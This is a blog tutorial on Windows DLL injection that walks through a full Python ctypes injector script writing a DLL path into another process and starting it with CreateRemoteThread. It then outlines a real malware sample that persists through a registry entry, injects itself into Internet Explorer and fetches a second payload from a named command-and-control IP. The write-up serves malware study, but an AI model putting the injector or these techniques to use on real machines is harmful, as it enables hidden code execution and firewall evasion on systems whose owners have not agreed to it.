Dll Injection

There are a lot of ways to alter a process’s execution path , Oh aren’t they many!- in this article , we’ll tackle one of the most commonly used techniques , DLL injection , We’ll start by looking at it’s concept and how to implement it your self ; then see it work in action in a real malware. Dll injection is a very common technique , where you can inject a dll into an executing binary , hence having it’s privileges would be great to evade a firewall for example.

Overall there are two types of injection -whether it’s code or dll injection- Static injection is when you change the binary it self before executing Dynamic injection is when you change the behaviour during execution
In dymanic dll injection we force the binary to load the dll by executing kernel32.LoadLibraryA in a new remote thread we’ll create there.

Now off to code so you get the picture :


from ctypes import *
import sys
#usage DllInjection.py  
#refer to MSDN if you don't know what these flags are
PG_RW= 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM=( 0x1000 | 0x2000 )

#load kernel32 library
kernel32=windll.kernel32
pid=sys.argv[1]
dll_path=sys.argv[2]
dll_len=len(dll_path)
#check if the dll exists
if os.path.isfile(dll_path)==false:
print "Dll not found , recheck the address"
sys.exit(0)

#open target process
h_process = kernel32.OpenProcess( 
     PROCESS_ALL_ACCESS, False, int(pid) )
#if failed , get out of here
if not h_process:
print "Failed to get handle to dll"
sys.exit(0)

#allocate memory in target process to put loadLibraryA argument ( our dll )
arg_address = kernel32.VirtualAllocEx(
     h_process, 0, dll_len, VIRTUAL_MEM,PG_RW)

#write the argument (again the path to our dll) in the process memory we just allocated.
written = c_int(0)
kernel32.WriteProcessMemory(h_process,
     arg_address, dll_path, dll_len,byref(written))

#get LoadLibraryA address
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h_loadlib = kernel32.GetProcAddress(
     h_kernel32,"LoadLibraryA")

#Create a new remote thread , executing loadLibrary with the argument we wrote above
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(
     h_process,None,0,h_loadlib,arg_address
     ,0,byref(thread_id)):

print "Failed to create thread"
sys.exit(0)
print "DLL injection success! ... Thread created with id 0x%08x" %thread_id.value

Dll1
Pretty straight forward right ? , if you want to test it i’ve attached the script along with a dll for testing

Now that you get the concept let’s take a look at dll injection in action
MD5 : E276F2C49D194DEF764A383482ECBD03
https://www.virustotal.com/en/file/c3636cd797f46f55e96cadeedf593663c0ebe2bc5cc1dabef6d1e62b5f6911c3/analysis/

the point of the article is not to do full analysis so I’ll skip a lot of details and focus mainly on the dll injection part .
Dll2
just to put you in the picture , in the first stage the malware creates 3 files ; shell32.dll , 123.dll , 123.info

it’ll write the path to the binary in 123.info then copy some data into shell32.dll , edit the registry by writing writes the value shell32.dll to it in order to get loaded on system boot by InProcServer32.

so now you can conclude that a system reboot will come next so that shell32.dll would come to life!
Dll3
And that ends the second stage , That leaves us with shell32.dll to analyze once it gets loaded at explorer.exe , the dll will inject it self in iexplorer.exe
Dll4Dll5
This looks familiar right ? Once the remote thread in iexplorer.exe executes the malicious activity will start .
Dll6
The thread will use send and recv functions form WS2_32.dll  to commuincate with CC at 209.160.21.76 the data received will be saved on disk as 123.dll and 123.complite ; lastly it’ll close the socket and create a new thread executing 123.dll. Which will probably be a backdoor.
Dll7
I chose not to go any further because the point of the article was to show you the concept of dll injection in a real life scenario , I may continue the analysis in a later article until then ,  Good luck!

Menna Essa

Code/Binaries – Archive
pass: ruinedsec

Advertisements
This entry was posted in Windows and tagged , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s